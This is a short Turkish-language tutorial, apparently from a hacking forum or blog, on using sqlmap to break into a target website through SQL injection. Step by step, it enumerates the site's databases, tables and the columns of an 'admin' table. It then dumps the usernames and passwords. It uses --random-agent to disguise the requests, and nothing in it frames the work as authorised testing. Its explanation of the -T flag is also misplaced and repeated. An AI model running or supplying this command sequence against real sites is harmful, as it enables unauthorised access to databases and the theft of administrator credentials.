SqlMap Kullanımı

                                           

Hedef Sitenin Database Adlarını Öğrenme

Hedef Sitemizin Database Adlarımızı Öğrenmemiz için;

sqlmap.py -u "xx.com/haber.php?id=4" --random-agent --dbs

(Çıkan Y/n Veya N/y Sorularına Entırlayıp Geçin)

 Çıktı;

[*] information_schema

[*] ip_whiz

Biz Buradan ip_whiz Databasesini Almamız Gerekiyor.

Hedef Sitenin Tablolarını Öğrenme

Hedef Sitemizin Database Tablolarını Öğrenmemiz için;

sqlmap.py -u "xx.com/haber.php?id=4" --random-agent -D ip_whiz --tables

(Çıkan Y/n Veya N/y Sorularına Entırlayıp Geçin)

Buradaki Değişiklik ise --tables Yerine -T kullanmamız çünkü artık Tablo Adlarımızı biliyoruz -T parametresini Kullanarak Tablo adımızı Yazıp onun Üzerinden işlem yapacağımızı Söylüyoruz.

 Hedef Sitenin Kolonlarını Öğrenme 

Hedef Sitemizin Databasesindeki Tablonun Kolonlarını Öğrenmemiz için;

 sqlmap.py -u "xx.com/haber.php?id=4" --random-agent -D ip_whiz -T admin --columns

(Çıkan Y/n Veya N/y Sorularına Entırlayıp Geçin)

 

 Buradaki Değişiklik ise --tables Yerine -T kullanmamız Tablolarımızı Öğrendiğimize Göre Belirli Bir Tablo Üzerinden işlem Yapmamızı Sağlıyor.

Hedef Sitenin Değerlerini Dışarı Aktarma ve Görme (Dump) 

Hedef Sitemizin Datbasesinin Tablosundaki kolonların Değerlerini Görmeyi/Dump Etmemiz için;

 sqlmap.py -u "xx.com/haber.php?id=4" --random-agent -D ip_whiz -T admin -C username,password --dump

(Çıkan Y/n Veya N/y Sorularına Entırlayıp Geçin)

Buradaki Değişiklik ise --columns Yerine -C yazarak Kolon İsimlerini Belirtiyoruz böylece Tüm kolonları Değil Sadece bizim için işe yarayacak Kolonları Dışarı Aktarmış/Görmüş Oluyoruz.